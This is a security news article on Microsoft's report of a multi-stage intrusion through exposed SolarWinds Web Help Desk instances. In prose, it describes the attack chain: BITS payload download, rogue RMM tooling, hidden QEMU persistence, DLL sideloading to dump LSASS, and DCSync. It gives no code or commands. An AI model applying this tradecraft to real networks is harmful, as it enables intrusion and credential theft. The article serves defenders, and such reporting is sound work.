Microsoft disclosed that it observed a multi-stage intrusion in which an attacker exploited an Internet-exposed SolarWinds Web Help Desk (WHD) instance to gain initial access and move laterally across an organization’s network to other high-value assets.
That said, the Microsoft Defender Security Research Team is wondering whether this activity weaponized recently disclosed flaws (CVE-2025-40551, CVSS Score: 9.8, and CVE-2025-40536, CVSS Score: 8.1) or previously patched vulnerabilities (CVE-2025-26399, CVSS Score: 9.8) It is unclear whether it was weaponized.
“As the attack occurred in December 2025 and occurred simultaneously against machines vulnerable to both old and new sets of CVEs, we cannot confirm with certainty the exact CVEs used to gain an initial foothold,” the company said in a report released last week.
CVE-2025-40536 is a security control bypass vulnerability that allows an unauthenticated attacker to access certain restricted functionality, while CVE-2025-40551 and CVE-2025-26399 both refer to untrusted data deserialization vulnerabilities that could potentially lead to remote code execution.
Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of it being exploited in the wild. Federal Civilian Executive Branch (FCEB) agencies have been ordered to apply a fix for this flaw by February 6, 2026.
The attack detected by Microsoft successfully exploited an exposed SolarWinds WHD instance, allowing the attacker to execute unauthenticated remote code and execute arbitrary commands within the WHD application context.
“Successful exploitation resulted in the service of the compromised WHD instance generating a PowerShell that leverages BITS. [Background Intelligent Transfer Service] for downloading and executing the payload,” researchers Sagar Putil, Hardik Suri, Eric Hopper and Kajhon Soyini noted.
In the next stage, the attackers downloaded a legitimate component related to Zoho ManageEngine, a legitimate remote monitoring and management (RMM) solution, allowing them to gain persistent remote control over the infected systems. The attacker followed this with a series of actions –
Enumerate sensitive domain users and groups, including domain administrators. Establishing persistence via reverse SSH and RDP access, the attacker creates a scheduled task that launches a QEMU virtual machine under the SYSTEM account at system startup in an attempt to hide their tracks within the virtualized environment while exposing SSH access via port forwarding. DLL sideloading was used on some hosts using a legitimate system executable “wab.exe” associated with the Windows Address Book to launch a malicious DLL (“sspicli.dll”) to dump the contents of LSASS memory and perform credential theft.
According to Microsoft, in at least one case, threat actors carried out DCSync attacks. This attack simulates a domain controller (DC) and requests password hashes and other sensitive information from the Active Directory (AD) database.
To combat this threat, we recommend that users keep their WHD instances up to date, locate and remove rogue RMM tools, rotate service and administrator accounts, and isolate compromised machines to limit compromise.
“This activity reflects a common but high-impact pattern: If vulnerabilities are unpatched or poorly monitored, the exposure of a single application can potentially compromise an entire domain,” the Windows maker said.
“In this breach, the attackers relied heavily on resident techniques, legitimate management tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of layered defenses, timely patching of internet-facing services, and behavioral-based detection across the identity, endpoint, and network layers.”
Source link
